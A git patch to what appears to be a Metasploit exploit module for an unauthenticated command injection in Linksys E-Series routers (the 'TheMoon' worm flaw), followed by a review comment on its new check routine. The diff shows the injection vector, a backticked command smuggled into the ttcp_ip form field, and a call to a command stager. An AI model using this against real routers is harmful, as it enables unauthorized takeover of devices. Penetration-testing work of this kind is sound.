From 0ae75860ea27c42b1a0e077e25e7055d437db7e3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 4 Apr 2014 14:02:12 -0500
Subject: [PATCH] Code clean up
---
 .../linux/http/linksys_themoon_exec.rb | 63 ++++++++++---------
 1 file changed, 33 insertions(+), 30 deletions(-)
diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb
index 4378d2daaf..68963d810c 100644
--- a/modules/exploits/linux/http/linksys_themoon_exec.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec.rb
@@ -15,14 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Linksys E-Series TheMoon Remote Command Injection',
 'Description' => %q{
- Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
- injection. Since it is a blind os command injection vulnerability, there is no
- output for the executed command when using the cmd generic payload. A ping
- command against a controlled system could be used for testing purposes. This
- vulnerability was used from the so called "TheMoon" worm. There are many Systems
- that might be vulnerable:
- E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
- module was tested against a E1500 v1.0.5.
+ Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
+ injection. This vulnerability was used from the so called "TheMoon" worm. There
+ are many Linksys systems that might be vulnerable including E4200, E3200, E3000,
+ E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested
+ successfully against an E1500 v1.0.5.
 },
 'Author' => [
@@ -86,33 +83,39 @@ class Metasploit3 < Msf::Exploit::Remote
 "ttcp_ip" => "-h `#{cmd}`",
 "StartEPI" => "1"
 }
- })
+ }, 2)
 return res
- rescue ::Rex::ConnectionError
- vprint_error("#{peer} - Failed to connect to the web server")
- return nil
- end
- end
-
- def exploit
- print_status("#{peer} - Trying to access the vulnerable url")
- begin
- res = send_request_cgi({
- 'uri' => '/tmUnblock.cgi',
- 'method' => 'GET',
- })
- if res.nil? or res.code == 404
- fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
- end
- if [200, 301, 302].include?(res.code)
- print_good("#{peer} - Successfully accessed the vulnerable url")
- else
- fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
- end
 rescue ::Rex::ConnectionError
 fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
 end
+ end
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => '/tmUnblock.cgi',
+ 'method' => 'GET'
+ })
+
+ if res && [200, 301, 302].include?(res.code)
+ return Exploit::CheckCode::Detected
+ end
+ rescue ::Rex::ConnectionError
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+ def exploit
+ print_status("#{peer} - Trying to access the vulnerable URL...")
+
+ unless check == Exploit::CheckCode::Detected
+ fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+ end
+
+ print_status("#{peer} - Exploiting...")
 execute_cmdstager
 end
+ end
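Review bot: The new `check` returns `Exploit::CheckCode::Detected` for any 200, 301 or 302 on `/tmUnblock.cgi`, so a web server that redirects every unknown path is reported the same way as a device that really serves the CGI; anyone using this check for exposure triage should read Detected as "the path answered", not as confirmation of the flaw. A comment above the status test would make that explicit, for example `# Detected only means the CGI path answered; redirects from unrelated servers also match`. In the rewritten `exploit`, every non-Detected result becomes `Failure::Unknown`, and because `check` rescues `::Rex::ConnectionError` itself, an unreachable host is no longer reported as `Failure::Unreachable` on this path as the removed code did. The `2` added to the `send_request_cgi` call at the top of the hunk appears to be a response timeout and deserves a short comment saying why it is so short; that method starts outside the hunk.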